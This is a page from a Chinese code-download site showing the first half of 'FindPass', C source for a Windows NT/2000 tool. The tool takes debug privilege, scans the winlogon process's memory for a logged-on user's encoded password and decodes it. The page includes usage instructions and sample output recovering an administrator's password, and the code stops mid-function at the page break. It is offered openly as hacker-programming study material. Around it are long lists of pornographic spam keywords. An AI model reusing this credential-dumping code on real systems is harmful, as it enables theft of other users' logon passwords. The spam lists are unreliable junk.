亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? findpass源代碼.txt

?? 可以對黑客編程有一定的了解
?? TXT
?? 第 1 頁 / 共 2 頁
字號:
// Find Password from winlogon in win2000 / winnt4 + < sp6
//
// PasswordReminder.cpp --> FindPass.cpp
// 1. http://www.smidgeonsoft.com/
// 2. shotgun add comment, bingle change a little to find other user in winlogon
// This code is licensed under the terms of the GPL (gnu public license). 
//
// Usage: FindPass DomainName UserName PID-of-WinLogon
//
// you can get the three params from pulist output in target system.
//

/*
因為登陸的域名和用戶名是明文存儲在winlogon進程里的,而PasswordReminder是限定了查找本進程用戶的密碼
<167-174: GetEnvironmentVariableW(L"USERNAME", UserName, 0x400); 
GetEnvironmentVariableW (L"USERDOMAIN", UserDomain, 0x400); 
>,然后到winlogon進程的空間中查找UserDomain和UserName < 590:// 在WinLogon的內存空間中尋找UserName和DomainName的字符串 
if ((wcscmp ((wchar_t *) RealStartingAddressP, UserName) == 0) 
&& 
(wcscmp ((wchar_t *) ((DWORD) RealStartingAddressP + USER_DOMAIN_OFFSET_WIN2K), UserDomain) == 0)) 
> ,找到后就查后邊的加密口令。 

其實只要你自己指定用戶名和winlogon進程去查找就行了,只要你是管理員,任何本機用msgina.dll圖形登陸的用戶口令都可以找到。 

1. pulist,找到系統里登陸的域名和用戶名,及winlogon進程id 
2. 然后給每個winlogon進程id查找指定的用戶就行了。

example: 

C:\Documents and Settings\bingle>pulist 
Process PID User 
Idle 0 
System 8 
smss.exe 164 NT AUTHORITY\SYSTEM 
csrss.exe 192 NT AUTHORITY\SYSTEM 
winlogon.exe 188 NT AUTHORITY\SYSTEM 
wins.exe 1212 NT AUTHORITY\SYSTEM 
Explorer.exe 388 TEST-2KSERVER\Administrator 
internat.exe 1828 TEST-2KSERVER\Administrator 
conime.exe 1868 TEST-2KSERVER\Administrator 
msiexec.exe 1904 NT AUTHORITY\SYSTEM 
tlntsvr.exe 1048 NT AUTHORITY\SYSTEM 
taskmgr.exe 1752 TEST-2KSERVER\Administrator 
csrss.exe 2056 NT AUTHORITY\SYSTEM 
winlogon.exe 2416 NT AUTHORITY\SYSTEM 
rdpclip.exe 2448 TEST-2KSERVER\clovea 
Explorer.exe 2408 TEST-2KSERVER\clovea 
internat.exe 1480 TEST-2KSERVER\clovea 
cmd.exe 2508 TEST-2KSERVER\Administrator 
ntshell.exe 368 TEST-2KSERVER\Administrator 
ntshell.exe 1548 TEST-2KSERVER\Administrator 
ntshell.exe 1504 TEST-2KSERVER\Administrator 
csrss.exe 1088 NT AUTHORITY\SYSTEM 
winlogon.exe 1876 NT AUTHORITY\SYSTEM 
rdpclip.exe 1680 TEST-2KSERVER\bingle 
Explorer.exe 2244 TEST-2KSERVER\bingle 
conime.exe 2288 TEST-2KSERVER\bingle 
internat.exe 1592 TEST-2KSERVER\bingle 
cmd.exe 1692 TEST-2KSERVER\bingle 
mdm.exe 2476 TEST-2KSERVER\bingle 
taskmgr.exe 752 TEST-2KSERVER\bingle 
pulist.exe 2532 TEST-2KSERVER\bingle 

C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER 
administrator 188 

To Find Password in the Winlogon process 
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon 

The debug privilege has been added to PasswordReminder. 
The WinLogon process id is 188 (0x000000bc). 
To find TEST-2KSERVER\administrator password in process 188 ... 
The encoded password is found at 0x008e0800 and has a length of 10. 
The logon information is: TEST-2KSERVER/administrator/testserver. 
The hash byte is: 0x13. 

C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER 
clovea 1876 

To Find Password in the Winlogon process 
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon 

The debug privilege has been added to PasswordReminder. 
The WinLogon process id is 1876 (0x00000754). 
To find TEST-2KSERVER\clovea password in process 1876 ... 
PasswordReminder is unable to find the password in memory. 

C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER 
bingle 1876 

To Find Password in the Winlogon process 
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon 

The debug privilege has been added to PasswordReminder. 
The WinLogon process id is 1876 (0x00000754). 
To find TEST-2KSERVER\bingle password in process 1876 ... 
The logon information is: TEST-2KSERVER/bingle. 
There is no password. 

C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER 
clovea 2416 

To Find Password in the Winlogon process 
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon 

The debug privilege has been added to PasswordReminder. 
The WinLogon process id is 2416 (0x00000970). 
To find TEST-2KSERVER\clovea password in process 2416 ... 
The logon information is: TEST-2KSERVER/clovea. 
There is no password. 

C:\Documents and Settings\bingle> 

*/

#include <stdafx.h>
#include <windows.h> 
#include <tchar.h> 
#include <stdio.h> 
#include <stdlib.h> 

typedef struct _UNICODE_STRING 
{ 
USHORT Length; 
USHORT MaximumLength; 
PWSTR Buffer; 
} UNICODE_STRING, *PUNICODE_STRING; 

// Undocumented typedef‘s 
typedef struct _QUERY_SYSTEM_INFORMATION 
{ 
DWORD GrantedAccess; 
DWORD PID; 
WORD HandleType; 
WORD HandleId; 
DWORD Handle; 
} QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION; 
typedef struct _PROCESS_INFO_HEADER 
{ 
DWORD Count; 
DWORD Unk04; 
DWORD Unk08; 
} PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER; 
typedef struct _PROCESS_INFO 
{ 
DWORD LoadAddress; 
DWORD Size; 
DWORD Unk08; 
DWORD Enumerator; 
DWORD Unk10; 
char Name [0x108]; 
} PROCESS_INFO, *PPROCESS_INFO; 
typedef struct _ENCODED_PASSWORD_INFO 
{ 
DWORD HashByte; 
DWORD Unk04; 
DWORD Unk08; 
DWORD Unk0C; 
FILETIME LoggedOn; 
DWORD Unk18; 
DWORD Unk1C; 
DWORD Unk20; 
DWORD Unk24; 
DWORD Unk28; 
UNICODE_STRING EncodedPassword; 
} ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO; 

typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD); 
typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD); 
typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID); 
typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID); 
typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING); 

// Private Prototypes 
BOOL IsWinNT (void); 
BOOL IsWin2K (void); 
BOOL AddDebugPrivilege (void); 
DWORD FindWinLogon (void); 
BOOL LocatePasswordPageWinNT (DWORD, PDWORD); 
BOOL LocatePasswordPageWin2K (DWORD, PDWORD); 
void DisplayPasswordWinNT (void); 
void DisplayPasswordWin2K (void); 

// Global Variables 
PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation; 
PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer; 
PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation; 
PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer; 
PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString; 

DWORD PasswordLength = 0; 
PVOID RealPasswordP = NULL; 
PVOID PasswordP = NULL; 
DWORD HashByte = 0;
wchar_t UserName [0x400]; 
wchar_t UserDomain [0x400]; 

int __cdecl main( int argc, char* argv[] ) 
{ 
printf( "\n\t To Find Password in the Winlogon process\n" );
 printf( " Usage: %s DomainName UserName PID-of-WinLogon\n\n", argv[0] ); 

if ((!IsWinNT ()) 
&& 
(!IsWin2K ())) 
{ 
printf ("Windows NT or Windows 2000 are required.\n"); 
return (0); 
} 

// Add debug privilege to PasswordReminder - 
// this is needed for the search for Winlogon. 
// 增加PasswordReminder的權限 
// 使得PasswordReminder可以打開并調試Winlogon進程 
if (!AddDebugPrivilege ()) 
{ 
printf 
("Unable to add debug privilege.\n"); 
return (0); 
} 
printf ("The debug privilege has been added to PasswordReminder.\n"); 

// 獲得幾個未公開API的入口地址 
HINSTANCE hNtDll = 
LoadLibrary 
("NTDLL.DLL"); 
pfnNtQuerySystemInformation = 
(PFNNTQUERYSYSTEMINFORMATION) GetProcAddress 
(hNtDll, 
"NtQuerySystemInformation"); 
pfnRtlCreateQueryDebugBuffer = 
(PFNRTLCREATEQUERYDEBUGBUFFER) GetProcAddress 
(hNtDll, 
"RtlCreateQueryDebugBuffer"); 
pfnRtlQueryProcessDebugInformation = 
(PFNRTLQUERYPROCESSDEBUGINFORMATION) GetProcAddress 
(hNtDll, 
"RtlQueryProcessDebugInformation"); 
pfnRtlDestroyQueryDebugBuffer = 
(PFNRTLDESTROYQUERYDEBUGBUFFER) GetProcAddress 
(hNtDll, 
"RtlDestroyQueryDebugBuffer"); 
pfnRtlRunDecodeUnicodeString = 
(PFNTRTLRUNDECODEUNICODESTRING) GetProcAddress 
(hNtDll, 
"RtlRunDecodeUnicodeString"); 

// Locate WinLogon‘s PID - need debug privilege and admin rights. 
// 獲得Winlogon進程的PID 
// 這里作者使用了幾個Native API,其實使用PSAPI一樣可以 
DWORD WinLogonPID = 
argc > 3 ? atoi( argv[3] ) : FindWinLogon () ; 
if (WinLogonPID == 0) 
{ 
printf 
("PasswordReminder is unable to find WinLogon or you are using NWGINA.DLL.\n"); 
printf 
("PasswordReminder is unable to find the password in memory.\n"); 
FreeLibrary (hNtDll); 
return (0); 
} 

 printf("The WinLogon process id is %d (0x%8.8lx).\n", 
   WinLogonPID, WinLogonPID); 

// Set values to check memory block against. 
// 初始化幾個和用戶賬號相關的變量 
 memset(UserName, 0, sizeof (UserName)); 
 memset(UserDomain, 0, sizeof (UserDomain)); 
 if( argc > 2 )
 { 
  mbstowcs( UserName, argv[2], sizeof(UserName)/sizeof(*UserName) );
  mbstowcs( UserDomain, argv[1], sizeof(UserDomain)/sizeof(*UserDomain) );
 }else
 {
  GetEnvironmentVariableW(L"USERNAME", UserName, 0x400); 
  GetEnvironmentVariableW(L"USERDOMAIN", UserDomain, 0x400); 
 }
 printf( " To find %S\\%S password in process %d ...\n", UserDomain, UserName, WinLogonPID );

// Locate the block of memory containing 
// the password in WinLogon‘s memory space. 
// 在Winlogon進程中定位包含Password的內存塊 
BOOL FoundPasswordPage = FALSE; 
if (IsWin2K ()) 
FoundPasswordPage = 
LocatePasswordPageWin2K 
(WinLogonPID, 
&PasswordLength); 
else 
FoundPasswordPage = 
LocatePasswordPageWinNT 
(WinLogonPID, 
&PasswordLength); 

if (FoundPasswordPage) 
{ 
if (PasswordLength == 0) 
{ 
printf 
("The logon information is: %S/%S.\n", 
UserDomain, 
UserName); 
printf 
("There is no password.\n"); 
} 
else 
{ 
printf 
("The encoded password is found at 0x%8.8lx and has a length of %d.\n", 
RealPasswordP, 
PasswordLength); 
// Decode the password string. 
if (IsWin2K ()) 
DisplayPasswordWin2K (); 
else 
DisplayPasswordWinNT (); 
} 
} 
else 
printf 
("PasswordReminder is unable to find the password in memory.\n"); 

FreeLibrary 
(hNtDll); 
return (0); 
} // main 

// 
// IsWinNT函數用來判斷操作系統是否WINNT 
// 
BOOL 
IsWinNT 
(void) 
{ 
OSVERSIONINFO OSVersionInfo; 
OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); 
if (GetVersionEx 
(&OSVersionInfo)) 
return (OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT); 
else 
return (FALSE); 
} // IsWinNT 


// 
// IsWin2K函數用來判斷操作系統是否Win2K 
// 
BOOL 
IsWin2K 
(void) 
{ 
OSVERSIONINFO OSVersionInfo; 
OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); 
if (GetVersionEx 
(&OSVersionInfo)) 
return ((OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT) 
&& 
(OSVersionInfo.dwMajorVersion == 5)); 
else 
return (FALSE); 
} // IsWin2K 


// 
// AddDebugPrivilege函數用來申請調試Winlogon進程的特權 
// 
BOOL 
AddDebugPrivilege 
(void) 
{ 
HANDLE Token; 
TOKEN_PRIVILEGES TokenPrivileges, PreviousState; 
DWORD ReturnLength = 0; 
if (OpenProcessToken 
(GetCurrentProcess (), 
TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, 
&Token)) 
if (LookupPrivilegeValue 
(NULL, 
"SeDebugPrivilege", 
&TokenPrivileges.Privileges[0].Luid)) 
{ 
TokenPrivileges.PrivilegeCount = 1; 
TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 
return 
(AdjustTokenPrivileges 
(Token, 
FALSE, 
&TokenPrivileges, 
sizeof (TOKEN_PRIVILEGES), 
&PreviousState, 
&ReturnLength)); 
} 
return (FALSE); 
} // AddDebugPrivilege 


// 
// Note that the following code eliminates the need 
// for PSAPI.DLL as part of the executable. 
// FindWinLogon函數用來尋找WinLogon進程 
// 由于作者使用的是Native API,因此不需要PSAPI的支持 
// 
DWORD 
FindWinLogon 
(void) 
{ 
#define INITIAL_ALLOCATION 0x100 
DWORD rc = 0; 
DWORD SizeNeeded = 0; 
PVOID InfoP = 
HeapAlloc 
(GetProcessHeap (), 
HEAP_ZERO_MEMORY, 
INITIAL_ALLOCATION); 
// Find how much memory is required. 
pfnNtQuerySystemInformation 
(0x10, 
InfoP, 
INITIAL_ALLOCATION, 
&SizeNeeded); 
HeapFree 
(GetProcessHeap (), 
0, 
InfoP); 
// Now, allocate the proper amount of memory. 
InfoP = 
HeapAlloc 
(GetProcessHeap (), 
HEAP_ZERO_MEMORY, 
SizeNeeded); 
DWORD SizeWritten = SizeNeeded; 
if (pfnNtQuerySystemInformation 

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
国产精品色噜噜| 国产高清在线观看免费不卡| 免费在线观看成人| 丰满亚洲少妇av| 91.成人天堂一区| 亚洲免费av观看| 国产精品66部| 日韩欧美国产一区在线观看| 亚洲视频免费在线观看| 精品一区二区三区免费观看| 欧美最猛黑人xxxxx猛交| 日本一区二区三区dvd视频在线| 午夜免费欧美电影| 色婷婷综合久久久中文一区二区| 久久久久久久免费视频了| 美女看a上一区| 欧美午夜精品一区二区蜜桃| 亚洲精品免费在线播放| 成人午夜伦理影院| 久久亚洲精精品中文字幕早川悠里 | 老司机午夜精品| 欧美日韩亚洲不卡| 亚洲亚洲人成综合网络| 91在线看国产| 成人欧美一区二区三区| 成人av高清在线| 自拍av一区二区三区| 大桥未久av一区二区三区中文| 久久久久久久网| 国产精品自拍一区| 国产色产综合产在线视频| 国产一区二区视频在线播放| www激情久久| 国产寡妇亲子伦一区二区| 国产日韩av一区| 国产传媒一区在线| 日本一区二区动态图| 成人小视频在线观看| 国产精品天美传媒| 成人免费看黄yyy456| 国产精品高潮呻吟久久| 91丨九色丨蝌蚪丨老版| 亚洲视频一二三| 精品视频资源站| 奇米精品一区二区三区在线观看| 91麻豆精品国产自产在线观看一区 | 欧美一级午夜免费电影| 全国精品久久少妇| 久久天堂av综合合色蜜桃网| 国产精品一区二区在线看| 国产欧美日韩亚州综合 | 精品一区二区免费| 久久久91精品国产一区二区精品| 成人sese在线| 亚洲午夜久久久久久久久电影院| 欧美福利视频导航| 国产乱码一区二区三区| 亚洲婷婷在线视频| 欧美日韩成人综合| 国产高清不卡二三区| 一区二区三区日本| 日韩一区二区精品在线观看| 国产成人精品综合在线观看| 最新日韩av在线| 91精品婷婷国产综合久久性色 | 国产清纯白嫩初高生在线观看91 | 欧美亚州韩日在线看免费版国语版| 婷婷综合另类小说色区| 久久久久免费观看| 欧美色手机在线观看| 极品少妇一区二区| 亚洲精品成a人| 精品国产sm最大网站| 色婷婷久久久综合中文字幕 | 色综合久久久久综合| 免费成人在线视频观看| 国产精品每日更新在线播放网址| 欧美视频在线观看一区二区| 国产成人在线电影| 丝袜脚交一区二区| 中文字幕中文字幕一区二区| 91精品免费在线| 欧美在线啊v一区| 成人黄色小视频在线观看| 日本aⅴ精品一区二区三区 | 蜜桃视频在线观看一区二区| 亚洲视频在线一区| 国产亚洲精品超碰| 日韩欧美资源站| 欧美影片第一页| av成人免费在线观看| 激情久久五月天| 日韩综合一区二区| 亚洲综合自拍偷拍| 最新成人av在线| 国产精品免费观看视频| 国产午夜精品一区二区三区嫩草 | 久久久久国产一区二区三区四区| 88在线观看91蜜桃国自产| 91在线视频官网| 成人福利视频网站| 国产一区二区剧情av在线| 日日夜夜免费精品| 亚洲va韩国va欧美va| 亚洲美女在线国产| 国产精品久久777777| 国产欧美日韩久久| 国产欧美精品一区二区三区四区| 欧美成人女星排行榜| 欧美电影免费观看高清完整版| 欧美乱妇一区二区三区不卡视频| 欧美午夜在线一二页| 欧美亚洲自拍偷拍| 欧美日韩日本视频| 欧美精品一级二级三级| 欧美日韩另类国产亚洲欧美一级| 欧美亚洲一区三区| 欧美精选一区二区| 日韩区在线观看| 久久久久久久久久久99999| 欧美精品一区二区三区蜜桃| 精品国产一区二区三区不卡 | 日韩欧美亚洲另类制服综合在线| 9191成人精品久久| 精品日韩一区二区三区| 精品久久久久久最新网址| 久久影院电视剧免费观看| 精品国内片67194| 久久一区二区三区国产精品| 精品美女一区二区三区| 久久精品日韩一区二区三区| 亚洲国产经典视频| 国产精品久久久久aaaa| 一区二区激情小说| 日本视频免费一区| 国产精品一区二区久激情瑜伽| 福利电影一区二区| 色哟哟精品一区| 宅男噜噜噜66一区二区66| 国产亚洲精久久久久久| 自拍偷自拍亚洲精品播放| 午夜av一区二区三区| 经典三级视频一区| 91亚洲精品久久久蜜桃| 欧美日韩国产小视频在线观看| 日韩欧美精品三级| 最新高清无码专区| 日韩二区在线观看| 国产69精品久久99不卡| 91福利国产精品| 欧美va亚洲va| 亚洲激情自拍偷拍| 久久66热re国产| 色偷偷成人一区二区三区91 | 91精品国产一区二区三区蜜臀| 久久精品一区二区三区不卡| 亚洲精品欧美在线| 九色综合狠狠综合久久| 色综合久久久久综合99| 久久久不卡影院| 亚洲大片一区二区三区| 国产精品99久久久久| 欧美久久一二三四区| 国产亚洲一区二区在线观看| 亚洲二区在线视频| 国产+成+人+亚洲欧洲自线| 欧美裸体bbwbbwbbw| 亚洲视频在线观看三级| 九一九一国产精品| 69成人精品免费视频| 国产精品美女久久久久av爽李琼| 久久疯狂做爰流白浆xx| 欧美日韩和欧美的一区二区| 国产精品国产自产拍高清av王其| 精品一区二区三区视频在线观看| 在线精品视频免费播放| 国产精品视频免费看| 久久精品国产网站| 欧美福利电影网| 亚洲成人自拍一区| 欧美亚洲高清一区二区三区不卡| 国产精品久久久久一区二区三区| 国产精品综合二区| 久久久久国产免费免费| 久久国产综合精品| 欧美一区二区三区男人的天堂| 亚洲国产精品自拍| 在线观看日韩电影| 中文字幕中文字幕中文字幕亚洲无线| 国产精品一区二区男女羞羞无遮挡 | 激情小说亚洲一区| 日韩西西人体444www| 日本午夜一区二区| 日韩视频一区二区在线观看| 日本不卡一区二区| 欧美另类z0zxhd电影| 丝袜a∨在线一区二区三区不卡| 欧洲一区二区三区在线| 悠悠色在线精品| 欧美视频一区二|